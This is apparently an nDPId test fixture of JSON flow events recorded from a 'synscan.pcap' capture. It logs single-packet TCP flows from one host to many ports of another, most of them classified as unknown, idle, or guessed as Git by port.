-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 